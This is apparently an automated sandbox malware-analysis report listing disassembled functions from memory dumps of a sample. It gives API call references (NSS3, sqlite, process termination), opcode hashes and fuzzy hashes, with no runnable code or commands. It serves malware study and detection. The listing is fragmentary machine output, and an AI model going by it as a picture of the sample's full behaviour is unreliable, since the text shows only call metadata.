Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: memset$memcpysqlite3_free
String ID:
API String ID: 2611698063-0
Opcode ID: 02c4bc03082e02ce1963e6f85849315356d3297f622c07dc9d7808837c17eeac
Instruction ID: 0d9388e1b36c97f2db5ab44abc99ab7e51f738b3ceef40d0dbfe7b8504c5b469
Opcode Fuzzy Hash: 02c4bc03082e02ce1963e6f85849315356d3297f622c07dc9d7808837c17eeac
Instruction Fuzzy Hash: 5841D471B202065BEB08CF6DC88166EB7EAFB84314F188979D825D7344E77DE8508B91

Uniqueness

Uniqueness Score: -1.00%

Function 6BB943D0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

NSSUTIL_ArgGetParamValue.NSS3(00000000,?,00000000,00000000), ref: 6BB943F1

Part of subcall function 6BB94120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB9413D
Part of subcall function 6BB94120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6BB94162
Part of subcall function 6BB94120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB9416B
Part of subcall function 6BB94120: PL_strncasecmp.NSS3(6BB94232,?,00000001), ref: 6BB94187
Part of subcall function 6BB94120: NSSUTIL_ArgSkipParameter.NSS3(6BB94232), ref: 6BB941A0
Part of subcall function 6BB94120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB941B4
Part of subcall function 6BB94120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6BB941CC
Part of subcall function 6BB94120: NSSUTIL_ArgFetchValue.NSS3(6BB94232,?), ref: 6BB94203

NSSUTIL_ArgGetParamValue.NSS3(00000000,?,00000000,00000000), ref: 6BB9440A
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,00000000,00000000), ref: 6BB9442F
free.MOZGLUE(?,?,?,00000000,00000000), ref: 6BB944D7

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Value$L_strncasecmpParamisspacestrlen$FetchParameterSkipfreestrcpy
String ID:
API String ID: 1432318688-0
Opcode ID: f4cd3db0c2712293846d7efa6869e5c165c9bcc47f4c25e75a4edf3c33fef168
Instruction ID: c99503fa26b8b418a26ef9c166fcce83d2ddd09e8f20119935b2a12bd1a3daf7
Opcode Fuzzy Hash: f4cd3db0c2712293846d7efa6869e5c165c9bcc47f4c25e75a4edf3c33fef168
Instruction Fuzzy Hash: A6315371E401954BEB20AE38FC713EB7BA6DF83365F1D4279D8B897381DA3899058391

Uniqueness

Uniqueness Score: -1.00%

Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415BEB

Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
CloseHandle.KERNEL32(00000000), ref: 00415CD6

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: fdfea1e36e01ba5dc6c08a707d84f87bfe87981db8c2dab46dee4399722e953d
Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
Opcode Fuzzy Hash: fdfea1e36e01ba5dc6c08a707d84f87bfe87981db8c2dab46dee4399722e953d
Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6BBFAAA2 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BC90D9C,00000000), ref: 6BBFAAD4
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BC90DA8,00000000), ref: 6BBFAAE3

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: _initialize_onexit_table
String ID:
API String ID: 2450287516-0
Opcode ID: c15592a06fc122091e3dc928b6babba10404d7e862a516717c18a0f8fdbf0926
Instruction ID: b493ce04d03a7f13c7358ea82b5f4de03b2b3cc8e7022ee2b23c15cfc8923643
Opcode Fuzzy Hash: c15592a06fc122091e3dc928b6babba10404d7e862a516717c18a0f8fdbf0926
Instruction Fuzzy Hash: D921C472C10645AADF09EF78D9016CE3BBADF06754F004095EC24EB281E779EA4ACF61

Uniqueness

Uniqueness Score: -1.00%

Function 6BB5ABF0 Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON

Download Yara Rule

APIs

CERT_GetFirstEmailAddress.NSS3(?), ref: 6BB5AC0B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BB5AC26
PR_Now.NSS3 ref: 6BB5AC34
CERT_GetNextEmailAddress.NSS3(?,00000000), ref: 6BB5AC6E

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: AddressEmail$FirstNextstrcmp
String ID:
API String ID: 3008928262-0
Opcode ID: d778c09ea3bf22fe84376c938f42b3073c18b62c2fdaac8b15b33ad28e474695
Instruction ID: e45e41bb796ce8d74783622c6e6fae5169acf022b737658be3fb49f6240b752b
Opcode Fuzzy Hash: d778c09ea3bf22fe84376c938f42b3073c18b62c2fdaac8b15b33ad28e474695
Instruction Fuzzy Hash: 6111E972A002866FA7009E7D9C8196F77E8EF45254B000478FD14D7211FB68D924CAB3

Uniqueness

Uniqueness Score: -1.00%

Function 6BB342B0 Relevance: 6.1, APIs: 4, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6BB3443C,?,?,00000001,?,?,6BB3443C,?,?,?,?,?), ref: 6BB342C5

Part of subcall function 6BB8F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BB8F0C8
Part of subcall function 6BB8F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BB8F122

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?), ref: 6BB342DD

Part of subcall function 6BB90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB908B4

PORT_ArenaAlloc_Util.NSS3(?,00000024,?,?,?,?,?), ref: 6BB342F5

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6BB3431B

Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9116E

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Arena$Alloc_AllocateArena_FreeValue$CriticalEncodeEnterErrorFindItem_SectionTag_Unlock
String ID:
API String ID: 1881930575-0
Opcode ID: 7e93ddd4fca74022e31e5a3e39b940109686263ffdbf34f714f61f5f6188f7c2
Instruction ID: d25ef7814412ec5f494d41c9251b224887de0ff9fa7ee9f953498a3a78a83ca5
Opcode Fuzzy Hash: 7e93ddd4fca74022e31e5a3e39b940109686263ffdbf34f714f61f5f6188f7c2
Instruction Fuzzy Hash: CE21C175A007459FEB00CF25DC41B6ABBB5FF99344F1542A9EC188F222E772D991CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BC4CB30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6BBF9890: TlsGetValue.KERNEL32(?,?,?,6BBF97EB), ref: 6BBF989E

EnterCriticalSection.KERNEL32(0000001E,?,?,00000000,?,6BBC5262,?,?,?,6BBBE333,?,?,6BBBDC77), ref: 6BC4CB47
_PR_MD_UNLOCK.NSS3(-0000001A,?,6BBC5262,?,?,?,6BBBE333,?,?,6BBBDC77), ref: 6BC4CB99
_PR_MD_NOTIFYALL_CV.NSS3(?,?,?,6BBC5262,?,?,?,6BBBE333,?,?,6BBBDC77), ref: 6BC4CBC3
_PR_MD_NOTIFY_CV.NSS3(?,?,?,6BBC5262,?,?,?,6BBBE333,?,?,6BBBDC77), ref: 6BC4CBD2

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CriticalEnterSectionValue
String ID:
API String ID: 2782078792-0
Opcode ID: c292ebcfac71461edd89f211ab3c2ede16b54d370ff3fd3bb9d780c8c99f0f31
Instruction ID: ddd9705998d30491c208e0b544e4f18755b36f66c96135ebceb811ce1f1d9395
Opcode Fuzzy Hash: c292ebcfac71461edd89f211ab3c2ede16b54d370ff3fd3bb9d780c8c99f0f31
Instruction Fuzzy Hash: C511AF72C11601ABD7008F31D841A4BB3A8BF00369F148269D84857711F7B9FBDACBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC4C3C0 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6BBF9890: TlsGetValue.KERNEL32(?,?,?,6BBF97EB), ref: 6BBF989E

EnterCriticalSection.KERNEL32(?), ref: 6BC4C40A
_PR_MD_NOTIFYALL_CV.NSS3(?,-0000001C), ref: 6BC4C427
_PR_MD_UNLOCK.NSS3(-0000001C), ref: 6BC4C446
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6BC4C464

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CriticalEnterSectionValue
String ID:
API String ID: 2782078792-0
Opcode ID: 9d0d98bbbebd638d5226ec1730f82ba86c3c26b33f5d0a73d61463b6e1c03ca8
Instruction ID: 4b28b127f2854cce09ab873e4de337f5a2ee0385446cd0c37a70dd093e24bada
Opcode Fuzzy Hash: 9d0d98bbbebd638d5226ec1730f82ba86c3c26b33f5d0a73d61463b6e1c03ca8
Instruction Fuzzy Hash: E611C476D102119BC7009F34D84576B77A8EF44798B2544B5D81857316FB3AEE8ACBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC0320 Relevance: 6.1, APIs: 4, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(?,00000000,00000000,00000000), ref: 6BBC0367
PR_NewLock.NSS3(00000000), ref: 6BBC0376
PR_SetError.NSS3(FFFFE89D,00000000,00000000), ref: 6BBC038C
GetLastError.KERNEL32 ref: 6BBC0396

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Error$CreateLastLockMutex
String ID:
API String ID: 625223036-0
Opcode ID: 3f32d916fd4e694e7adf2769458d557bdbd431506bf639dcd2fed3cabe902f45
Instruction ID: 6402992471b5a7f472c8852fe3954bb995f7ac84c0508a7a1cf0a9bca096397b
Opcode Fuzzy Hash: 3f32d916fd4e694e7adf2769458d557bdbd431506bf639dcd2fed3cabe902f45
Instruction Fuzzy Hash: 5F112BB5E00258AFC710DFB8D80965FBBB8EF4A754F408525E419D7100E738D544CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC2BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BBC2A28,00000060,00000001), ref: 6BBC2BF0

Part of subcall function 6BB395B0: TlsGetValue.KERNEL32(00000000,?,6BB500D2,00000000), ref: 6BB395D2
Part of subcall function 6BB395B0: EnterCriticalSection.KERNEL32(?,?,?,6BB500D2,00000000), ref: 6BB395E7
Part of subcall function 6BB395B0: PR_Unlock.NSS3(?,?,?,?,6BB500D2,00000000), ref: 6BB39605

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BBC2A28,00000060,00000001), ref: 6BBC2C07
SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6BBC2A28,00000060,00000001), ref: 6BBC2C1E
free.MOZGLUE(?,00000000,00000000,?,6BBC2A28,00000060,00000001), ref: 6BBC2C4A

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
String ID:
API String ID: 358400960-0
Opcode ID: f1c531d9b48f3899b840667bef2b1629d74ffe7ce2f67bd0779ab98cada6bb2d
Instruction ID: d828ddd09416436d5ae932336c80fbcd8a447410b0fe68cc8f2ec06158fa8def
Opcode Fuzzy Hash: f1c531d9b48f3899b840667bef2b1629d74ffe7ce2f67bd0779ab98cada6bb2d
Instruction Fuzzy Hash: 32015EF5E007805BEB20CF39E905717B7F8AF54644F004A28E89AD3642FB79F558C692

Uniqueness

Uniqueness Score: -1.00%

Function 00414ED0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
HeapAlloc.KERNEL32(00000000), ref: 00414F23
wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

%dx%d, xrefs: 00414F34

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00416F20 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00416F72
lstrcat.KERNEL32(00000000), ref: 00416F82

Strings

6F@, xrefs: 00416F29
6F@, xrefs: 00416F37

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: 6F@$6F@
API String ID: 3905823039-140834422
Opcode ID: a8e5935f14eb29423586bb7997bcffb204c8ef295a6cede93f695f23dfd29d54
Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
Opcode Fuzzy Hash: a8e5935f14eb29423586bb7997bcffb204c8ef295a6cede93f695f23dfd29d54
Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414450 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
HeapAlloc.KERNEL32(00000000), ref: 00414464
GetLocalTime.KERNEL32(?), ref: 00414471
wsprintfA.USER32 ref: 004144A0

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00415260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetSystemTime.KERNEL32(?,04287A20,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Strings

#F@, xrefs: 0041526C, 004152E5, 004152F0, 00415304, 004152D3, 004152F3
#F@, xrefs: 004152B1, 004152E1, 004152E4

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: #F@$#F@
API String ID: 62757014-661595268
Opcode ID: 46bb61088adb986cea44f6a6b3dbddea4d536a4a112ae46855b01c312768cf16
Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
Opcode Fuzzy Hash: 46bb61088adb986cea44f6a6b3dbddea4d536a4a112ae46855b01c312768cf16
Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6BB24380 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

sqlite3_result_error_code.NSS3(?,?,00000000,?,?,6BB23FE8), ref: 6BB243BF
sqlite3_result_error_nomem.NSS3(?), ref: 6BB24415

Part of subcall function 6BAE13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6BAB2352,?,00000000,?,?), ref: 6BAE1413
Part of subcall function 6BAE13C0: memcpy.VCRUNTIME140(00000000,6BAB2352,00000002,?,?,?,?,6BAB2352,?,00000000,?,?), ref: 6BAE14C0

Strings

string or blob too big, xrefs: 6BB24405

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: memcpysqlite3_result_error_codesqlite3_result_error_nomemstrlen
String ID: string or blob too big
API String ID: 2359001612-2803948771
Opcode ID: 4e0cb959caf27a015e276dea58388a46cb0dbda040de1fc4b24724a29b9d7481
Instruction ID: d71ab444ff51c2dc9f12fe95cceca9270671a424e40adbd820dfdf5baea036a7
Opcode Fuzzy Hash: 4e0cb959caf27a015e276dea58388a46cb0dbda040de1fc4b24724a29b9d7481
Instruction Fuzzy Hash: 10010875A1428053D6106B789D02B7B77ED9F8670CF000569EA4CC3642FB7DD69252B2

Uniqueness

Uniqueness Score: -1.00%

